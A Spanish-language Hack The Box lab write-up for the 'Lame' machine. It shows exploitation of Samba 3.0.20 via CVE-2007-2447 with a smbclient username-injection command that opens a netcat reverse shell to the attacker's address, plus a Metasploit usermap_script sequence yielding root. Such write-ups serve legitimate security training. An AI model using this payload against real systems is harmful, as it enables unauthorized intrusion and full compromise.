write-ups / hackthebox / lame-htb

HackTheBoxeasyLinux

Lame — Samba CVE-2007-2447

Explotación de Samba 3.0.20 en Lame de HTB. Vulnerabilidad CVE-2007-2447 (username map script) para obtener root directamente.

14 de febrero de 20241 min read
HTBSambaCVE-2007-2447LinuxCommand Injection

Reconocimiento

bash
nmap -sV -sC -oN lame.nmap 10.10.10.3

Puertos: 21 (FTP vsftpd 2.3.4), 22 (SSH), 139/445 (Samba 3.0.20-Debian).

Enumeración FTP

vsftpd 2.3.4 tiene un backdoor conocido, pero en esta máquina no funciona.

Explotación Samba

Samba 3.0.20 es vulnerable a CVE-2007-2447 — command injection via
bash
username map script
:
bash
smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/bash 10.10.14.5 4444`'

O con Metasploit:

bash
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST tun0
run
Shell directa como
bash
root
.

Flags

bash
cat /home/makis/user.txt
cat /root/root.txt